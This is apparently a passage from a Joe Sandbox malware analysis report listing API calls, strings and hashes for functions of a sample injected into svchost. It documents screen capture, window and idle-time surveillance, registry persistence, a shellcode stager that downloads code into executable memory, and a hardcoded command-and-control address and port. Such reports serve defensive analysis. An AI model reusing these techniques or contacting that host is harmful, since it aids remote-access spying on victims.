                                                                                                              • RegQueryValueExW.KERNELBASE(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04DF75B3
                                                                                                              • RegCloseKey.KERNELBASE(000002FA), ref: 04DF75D6
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,04DF5611,0000035E,000002FA), ref: 04DF75E8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                              • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                              • API String ID: 2158625971-3190923360
                                                                                                              • Opcode ID: 08d6d9af0aeb14f00d072a39597d411bcca22e2f529a9f0ca466054ee7ecffde
                                                                                                              • Instruction ID: ea8ffdaf0861900781f633cc8b0aea78977fd51b5950cbcd85605d4b747bc24a
                                                                                                              • Opcode Fuzzy Hash: 08d6d9af0aeb14f00d072a39597d411bcca22e2f529a9f0ca466054ee7ecffde
                                                                                                              • Instruction Fuzzy Hash: 97318675B402087BE724DFA4DC45FFFB7BCEB48700F114519BB06A6285EA74BA008B60
                                                                                                              Function 04DFC0B0 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000002,?,E179827C,?,00000000,?), ref: 04DFC0EE
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 04DFC0FA
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 04DFC10F
                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DFC125
                                                                                                              • EnterCriticalSection.KERNEL32(04E1FB64), ref: 04DFC163
                                                                                                              • LeaveCriticalSection.KERNEL32(04E1FB64), ref: 04DFC174
                                                                                                                • Part of subcall function 04DF9E30: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DF9E54
                                                                                                                • Part of subcall function 04DF9E30: GdipDisposeImage.GDIPLUS(?), ref: 04DF9E68
                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DFC19C
                                                                                                                • Part of subcall function 04DFA4B0: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DFA4DD
                                                                                                                • Part of subcall function 04DFA4B0: _free.LIBCMT ref: 04DFA553
                                                                                                              • GetHGlobalFromStream.OLE32(?,?), ref: 04DFC1BD
                                                                                                              • GlobalLock.KERNEL32(?), ref: 04DFC1C7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 04DFC1DF
                                                                                                                • Part of subcall function 04DF9BF0: DeleteObject.GDI32(?), ref: 04DF9C22
                                                                                                                • Part of subcall function 04DF9BF0: EnterCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C33
                                                                                                                • Part of subcall function 04DF9BF0: EnterCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C48
                                                                                                                • Part of subcall function 04DF9BF0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,04DF9BCB), ref: 04DF9C54
                                                                                                                • Part of subcall function 04DF9BF0: LeaveCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C65
                                                                                                                • Part of subcall function 04DF9BF0: LeaveCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C6C
                                                                                                              • GlobalSize.KERNEL32(00000000), ref: 04DFC1F5
                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 04DFC271
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 04DFC299
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1483550337-0
                                                                                                              • Opcode ID: dcff3bf4e04c4621e72036a75d2b486d4d9ac23e530a20866b712156c0b4ae69
                                                                                                              • Instruction ID: 1c7763983c23cd8bafade50d166212a2bbda68e83af65944d67574aea88953fd
                                                                                                              • Opcode Fuzzy Hash: dcff3bf4e04c4621e72036a75d2b486d4d9ac23e530a20866b712156c0b4ae69
                                                                                                              • Instruction Fuzzy Hash: 38612DB1E00208AFDB10EFE9DC8499EBBB9FF48715F11452AE915A7355DB34A901CFA0
                                                                                                              Function 04DF64E0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF6512
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 04DF6532
                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 04DF6574
                                                                                                              • _memset.LIBCMT ref: 04DF65B0
                                                                                                              • _memset.LIBCMT ref: 04DF65DE
                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000B9C,75A773E0), ref: 04DF660A
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000B9C,75A773E0), ref: 04DF6613
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000B9C,75A773E0), ref: 04DF6625
                                                                                                              • RegCloseKey.ADVAPI32(?,00000000,00000B9C,75A773E0), ref: 04DF6675
                                                                                                              • lstrlenW.KERNEL32(?), ref: 04DF6685
                                                                                                              Strings
                                                                                                              • Software\Tencent\Plugin\VAS, xrefs: 04DF6528
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                              • String ID: Software\Tencent\Plugin\VAS
                                                                                                              • API String ID: 2921034913-3343197220
                                                                                                              • Opcode ID: 8ff85024897bdbd4bf9ae2bd56311c40b4612a545ca4472c54291dc5c25a3fab
                                                                                                              • Instruction ID: e8a010625a6614283c70939777f8fab9e67fa738637c9cd8682d0924bcc5ca96
                                                                                                              • Opcode Fuzzy Hash: 8ff85024897bdbd4bf9ae2bd56311c40b4612a545ca4472c54291dc5c25a3fab
                                                                                                              • Instruction Fuzzy Hash: 5C4186F5A40218ABEB30DB54DD85FEAB37CEB44704F0045D9E709B7081EA71BA858FA4
                                                                                                              Function 04DF6306 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 125stringregistryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 736 4df6306-4df630d 737 4df6310-4df63b3 call 4e067c0 wsprintfW RegOpenKeyExW 736->737 740 4df6439-4df644f 737->740 741 4df63b9-4df63c6 call 4e067c0 737->741 744 4df6452-4df6454 740->744 743 4df63cb-4df640a RegQueryValueExW 741->743 746 4df642c-4df6433 RegCloseKey 743->746 747 4df640c-4df642a lstrcatW * 2 743->747 744->737 745 4df645a-4df6468 744->745 748 4df646a-4df646f 745->748 749 4df6472-4df647f lstrlenW 745->749 746->740 747->746 748->749 750 4df6491-4df64a0 749->750 751 4df6481-4df648b lstrcatW 749->751 752 4df64aa-4df64ca call 4dff05a 750->752 753 4df64a2-4df64a7 750->753 751->750 753->752
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF631E
                                                                                                              • wsprintfW.USER32 ref: 04DF6386
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DF63AF
                                                                                                              • _memset.LIBCMT ref: 04DF63C6
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,?,?,?), ref: 04DF6402
                                                                                                              • lstrcatW.KERNEL32(04E21F10,?), ref: 04DF641E
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E16388), ref: 04DF642A
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 04DF6433
                                                                                                              • lstrlenW.KERNEL32(04E21F10,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF6477
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E16404,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF648B
                                                                                                              Strings
                                                                                                              • CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 04DF6380
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
                                                                                                              • API String ID: 1671694837-4035668053
                                                                                                              • Opcode ID: 7339a97b84cf4155b2b0e62911b37ee9bc20b6da22813b705ed75df402005ae9
                                                                                                              • Instruction ID: 42a05fd88655efdbb4450598255c77087c2a9167f115501f9429faac1100ac12
                                                                                                              • Opcode Fuzzy Hash: 7339a97b84cf4155b2b0e62911b37ee9bc20b6da22813b705ed75df402005ae9
                                                                                                              • Instruction Fuzzy Hash: 7D41A1B1A40228ABDB34DB50CC50FEEB7B8AF48705F0441C8F749A7181DA74AB81CF64
                                                                                                              Function 04DF8140 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLogicalDriveStringsW.KERNELBASE(000003E8,?,75A773E0,00000B9C,00000000), ref: 04DF8182
                                                                                                              • lstrcmpiW.KERNEL32(?,A:\), ref: 04DF81B6
                                                                                                              • lstrcmpiW.KERNEL32(?,B:\), ref: 04DF81C6
                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DF81F6
                                                                                                              • lstrlenW.KERNEL32(?), ref: 04DF8207
                                                                                                              • __wcsnicmp.LIBCMT ref: 04DF821E
                                                                                                              • lstrcpyW.KERNEL32(00000B9C,?), ref: 04DF8254
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 04DF8278
                                                                                                              • lstrcatW.KERNEL32(?,00000000), ref: 04DF8283
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                              • String ID: A:\$B:\
                                                                                                              • API String ID: 950920757-1009255891
                                                                                                              • Opcode ID: df951d4ce73a85ace69c5c9807b0f5e3b3f6ee0a1c06221bce3efc126110d374
                                                                                                              • Instruction ID: f0f1e712d7e6a3beb70e483207165941f1e5e633c8e9e6c34932fbf026e5ad19
                                                                                                              • Opcode Fuzzy Hash: df951d4ce73a85ace69c5c9807b0f5e3b3f6ee0a1c06221bce3efc126110d374
                                                                                                              • Instruction Fuzzy Hash: 8441A971B412189BEB20EFA5DC44AEDB3B8FF44315F014199EE0AA3144EB75BE05CB95
                                                                                                              Function 04DF67E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF5320: InterlockedDecrement.KERNEL32(00000008), ref: 04DF536F
                                                                                                                • Part of subcall function 04DF5320: SysFreeString.OLEAUT32(00000000), ref: 04DF5384
                                                                                                                • Part of subcall function 04DF5320: SysAllocString.OLEAUT32(04E16148), ref: 04DF53D5
                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,04E16148,04DF69F4,04E16148,00000000,75A773E0), ref: 04DF6844
                                                                                                              • GetLastError.KERNEL32 ref: 04DF684E
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04DF6866
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04DF686D
                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 04DF688F
                                                                                                              • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 04DF68C1
                                                                                                              • GetLastError.KERNEL32 ref: 04DF68CB
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04DF6936
                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04DF693D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                              • String ID: NONE_MAPPED
                                                                                                              • API String ID: 1317816589-2950899194
                                                                                                              • Opcode ID: f4b5e03a6d10d88644cf818bf7aae7e82c4b767d0518447fbcde92eacfeec8a7
                                                                                                              • Instruction ID: ae2aee8faa7cffae335f3de9847a625a344894a5d275812b42c5b4103896991b
                                                                                                              • Opcode Fuzzy Hash: f4b5e03a6d10d88644cf818bf7aae7e82c4b767d0518447fbcde92eacfeec8a7
                                                                                                              • Instruction Fuzzy Hash: 684192B1A40208ABEB20DF65DD44FAEB7B9FB84701F41419DEB09A7140DA74AF85CF60
                                                                                                              Function 04DFA4B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DFA4DD
                                                                                                              • _malloc.LIBCMT ref: 04DFA521
                                                                                                              • _free.LIBCMT ref: 04DFA553
                                                                                                              • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 04DFA572
                                                                                                              • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 04DFA5E4
                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DFA5EF
                                                                                                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 04DFA615
                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DFA62D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                              • String ID: &
                                                                                                              • API String ID: 2794124522-3042966939
                                                                                                              • Opcode ID: 0a5e34cc80520cd8c778c893d74dfb71b87634e8984a49c71b320c5788cc7ebd
                                                                                                              • Instruction ID: 75257731d8d3b46e58f4a9740d179c08c009429f08153e6b8369ab703252a0aa
                                                                                                              • Opcode Fuzzy Hash: 0a5e34cc80520cd8c778c893d74dfb71b87634e8984a49c71b320c5788cc7ebd
                                                                                                              • Instruction Fuzzy Hash: 82511FB1A002199FDB24DFA4DC44AAEB7B8FF48714F068119EA15A7350E634F945CBA0
                                                                                                              Function 025852B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,00000102,?), ref: 02585382
                                                                                                              • RegDeleteValueW.KERNELBASE(?,IpDates_info), ref: 02585392
                                                                                                              • RegSetValueExW.KERNELBASE(?,IpDates_info,00000000,00000003,0259C6E0,000012A0), ref: 025853B0
                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 025853BB
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0258540F
                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0258541B
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 02585434
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                              • API String ID: 864241144-2243437601
                                                                                                              • Opcode ID: 40ba056a0f997c5cd7baba615f3ba0c140a9a767045db25042142d69120e3857
                                                                                                              • Instruction ID: ff2022162a5c7905df02c82f31212bb438f9383980e249a6ef9b3a4d24ebaa47
                                                                                                              • Opcode Fuzzy Hash: 40ba056a0f997c5cd7baba615f3ba0c140a9a767045db25042142d69120e3857
                                                                                                              • Instruction Fuzzy Hash: 084168716542409BD311AF349808B7A7FA5FB59304FDB0849E182A6142FBF0D916C79E
                                                                                                              Function 025852D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,00000102,?), ref: 02585382
                                                                                                              • RegDeleteValueW.KERNELBASE(?,IpDates_info), ref: 02585392
                                                                                                              • RegSetValueExW.KERNELBASE(?,IpDates_info,00000000,00000003,0259C6E0,000012A0), ref: 025853B0
                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 025853BB
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0258540F
                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0258541B
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 02585434
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                              • API String ID: 864241144-2243437601
                                                                                                              • Opcode ID: 05f3f7a53053aaa02a3e407a130b235c4b6c24277a7bffc74b55976f837f47f8
                                                                                                              • Instruction ID: e0a17fa333423df7e084b416c564710e541fd6aa8abff3c96f456b42e78e1561
                                                                                                              • Opcode Fuzzy Hash: 05f3f7a53053aaa02a3e407a130b235c4b6c24277a7bffc74b55976f837f47f8
                                                                                                              • Instruction Fuzzy Hash: 1231B4706A43819FD711EF348808B7A7FA5BB49304FDE0849F685AA142EBF0D916C75D
                                                                                                              Function 02586110 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 172sleepsynchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 02587654: __fassign.LIBCMT ref: 0258764A
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 0258614C
                                                                                                                • Part of subcall function 02586FF7: _malloc.LIBCMT ref: 02587011
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 025862B1
                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 025862FD
                                                                                                                • Part of subcall function 02582C50: WSAStartup.WS2_32(00000202,?), ref: 02582CAF
                                                                                                                • Part of subcall function 02582C50: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02582CBA
                                                                                                                • Part of subcall function 02582C50: InterlockedExchange.KERNEL32(00000018,00000000), ref: 02582CC8
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02586347
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02586365
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02586372
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateEventHandleSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                                                                                                              • String ID: 47.239.116.158$6666
                                                                                                              • API String ID: 3083163006-2305970290
                                                                                                              • Opcode ID: bddf16b73e43e4bb3e3f09e3ce427335fbb8edbce8c2cfee1f380705ed14bc45
                                                                                                              • Instruction ID: e479f7d09bfd1f0fa8d6f6777af3c3072348617e0491da71fbcc94d778dd61a7
                                                                                                              • Opcode Fuzzy Hash: bddf16b73e43e4bb3e3f09e3ce427335fbb8edbce8c2cfee1f380705ed14bc45
                                                                                                              • Instruction Fuzzy Hash: 6751E5B0E41206AFEF00FFA4DC81A6EBBB6BF4C714F140559E101B7285DBB09A14DB99
                                                                                                              Function 0017033A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158networkmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • socket.WS2_32(00000002,00000001,00000006,00000000,00000000,?,?,0017030E,00000001), ref: 00170350
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0008000E,00003000,00000040,?,?,0017030E,00000001), ref: 0017036C
                                                                                                              • connect.WS2_32(?,?,00000010), ref: 001703C9
                                                                                                              • send.WS2_32(?,00000001,00000003,00000000), ref: 001703EA
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0004D800,00003000,00000004), ref: 00170404
                                                                                                              • recv.WS2_32(?,00000001,00019000,00000000), ref: 0017041F
                                                                                                              • VirtualFree.KERNELBASE(00000001,00000000,00008000), ref: 0017044A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340160722.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_170000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$Alloc$Freeconnectrecvsendsocket
                                                                                                              • String ID: 32
                                                                                                              • API String ID: 799107390-2103780943
                                                                                                              • Opcode ID: 39020c141edd0a27ad9db8511efb2f7b938b6a5ba6550bf8215b5bfbcc17140d
                                                                                                              • Instruction ID: e008b880b53f8a7cb7b28c9b62a756a576dc2d0974ee44b9e2e8f7f07f8cc3c7
                                                                                                              • Opcode Fuzzy Hash: 39020c141edd0a27ad9db8511efb2f7b938b6a5ba6550bf8215b5bfbcc17140d
                                                                                                              • Instruction Fuzzy Hash: 1E518D70900304EFCF269F69C889B9E7F79EF48724F148195FE09AA196D771DA81CB90
                                                                                                              Function 04DFCAC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console\0,00000000,000F003F,04E12358,E179827C,00000001,00000000,00000000), ref: 04DFCB01
                                                                                                              • RegQueryInfoKeyW.ADVAPI32(04E12358,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04DFCB30
                                                                                                              • _memset.LIBCMT ref: 04DFCB94
                                                                                                              • _memset.LIBCMT ref: 04DFCBA3
                                                                                                              • RegEnumValueW.KERNELBASE(04E12358,?,00000000,?,00000000,?,00000000,?), ref: 04DFCBC2
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7A6
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7C0
                                                                                                                • Part of subcall function 04DFF757: __CxxThrowException@8.LIBCMT ref: 04DFF7D1
                                                                                                              • RegCloseKey.KERNELBASE(04E12358,?,?,?,?,?,?,?,?,?,?,?,00000000,04E12358,000000FF), ref: 04DFCCD3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                              • String ID: Console\0
                                                                                                              • API String ID: 1348767993-1253790388
                                                                                                              • Opcode ID: 133dff8ddaf0296e2afc5f77e82561688f9df6f4ff2fe2bb4ab3009cc50e2f2a
                                                                                                              • Instruction ID: 6a95085e13d300d59ac3bf422c9b0db68cdcf83cf968e5d5175be57f1c219567
                                                                                                              • Opcode Fuzzy Hash: 133dff8ddaf0296e2afc5f77e82561688f9df6f4ff2fe2bb4ab3009cc50e2f2a
                                                                                                              • Instruction Fuzzy Hash: 6E613DB5A00209AFDB14DFA8DC80EAEB7B8FF48314F15416AEA15E7245D735AD01CBA0
                                                                                                              Function 04DFBB50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • _memset.LIBCMT ref: 04DFBB71
                                                                                                              • GetLastInputInfo.USER32(?), ref: 04DFBB87
                                                                                                              • GetTickCount.KERNEL32 ref: 04DFBB8D
                                                                                                              • wsprintfW.USER32 ref: 04DFBBB6
                                                                                                              • GetForegroundWindow.USER32 ref: 04DFBBBF
                                                                                                              • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 04DFBBD3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                              • String ID: %d min
                                                                                                              • API String ID: 3754759880-1947832151
                                                                                                              • Opcode ID: e4d1ea22d592ffed3be516574fc06584b81183932947d7a8808cdff2476c178c
                                                                                                              • Instruction ID: 4dc97a2ef4f3c59043d8a6637a00fb12d93cf024fb090c7cd72e4574c6dc0bad
